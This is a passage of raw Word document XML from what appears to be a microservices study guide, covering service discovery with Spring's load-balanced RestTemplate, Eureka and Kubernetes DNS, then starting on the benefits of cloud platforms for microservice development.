        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserServiceApp</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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72A08D56"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Consumer (e.g., order-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E70C9F"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lastRenderedPageBreak/>
        <w:t>@LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDBDB4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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378BA8A"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999285B"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0088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE1E4C"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD3163"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC6C65"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Use service name instead of IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0738D4" w14:textId="77777777"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResponseEntity</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getForEntity</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACDFF5F" w14:textId="431BDCA1" w:rsidR="004274D4" w:rsidRPr="004274D4" w:rsidRDefault="00427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447474"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://user-service/users/{id}"</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> userId</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7AE4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The actual IP of user-service is resolved at runtime via </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka registry</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4F430"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533AB7F9">
          <v:rect id="_x0000_i3159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A8C9F4"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ervice Discovery in Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04585A6E"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Services register automatically via </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kube DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91D7B2"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You call services by name: http://user-service.default.svc.cluster.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120CA82D"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Kubernetes handles </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNS resolution and load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C7807"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0EB09ACF">
          <v:rect id="_x0000_i3160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB5686E"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Benefits of Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D740D2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No need to hardcode IPs/ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829EFD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upports dynamic scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3781B"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Helps with load balancing and failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30836B97"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Simplifies deployment and resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC35A25"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282FB863">
          <v:rect id="_x0000_i3161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D661290"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Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2DEF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Requires registry availability and consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90ED4A"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 xml:space="preserve">Need to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heartbeat failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC333C"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Misconfiguration can lead to service unavailability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76484E" w14:textId="77777777" w:rsidR="0091518F" w:rsidRPr="0091518F" w:rsidRDefault="00000000" w:rsidP="00893CBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="49C188DA">
          <v:rect id="_x0000_i3162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0CB6D" w14:textId="77777777" w:rsidR="0091518F" w:rsidRPr="0091518F" w:rsidRDefault="0091518F" w:rsidP="00893CBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48EE70" w14:textId="77777777" w:rsidR="0091518F" w:rsidRPr="0091518F" w:rsidRDefault="0091518F" w:rsidP="00893CBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables microservices to </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>find and communicate</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with each other dynamically through a </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service registry</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, improving scalability, fault tolerance, and maintainability in distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408693F3" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="00FA65E9" w:rsidRDefault="00000000" w:rsidP="007635D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7DA09AF6">
          <v:rect id="_x0000_i3163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830402A" w14:textId="7791601D" w:rsidR="000B09B5" w:rsidRPr="00CE4B95" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="739" w:name="_Toc197867953"/>
      <w:r w:rsidRPr="000B09B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In microservices architecture what are the benefits of cloud for code development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="739"/>
    </w:p>
    <w:p w14:paraId="0E1A4688" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">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In a microservices architecture, leveraging cloud environments for building and developing code offers several significant benefits. Here's how the cloud enhances the development process for microservices-based applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110768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Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F9F1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lastic Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>on-demand</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> scalability, enabling you to dynamically adjust resources (CPU, memory, storage) based on the demand for specific microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A7EA5B"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scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Cloud environments can automatically scale up or down based on traffic, ensuring that services remain responsive without requiring manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6A88F"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Faster Deployment and Continuous Integration/Continuous Deployment (CI/CD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D476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ed CI/CD Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>integrated CI/CD tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS CodePipeline, Azure DevOps, Google Cloud Build) that help automate testing, building, and deployment of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778D88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Quick Feedback Loops</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Microservices can be deployed faster, which allows for rapid iterations, testing, and the ability to release new features quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021800E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High Availability and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6439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Infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud providers use geographically distributed data centers, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>high availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your services even during failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB531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Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms provide built-in mechanisms for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>failov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so microservices can continue running smoothly even in case of infrastructure failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E9CE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Managed Services for Microservices Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248608B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naged Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
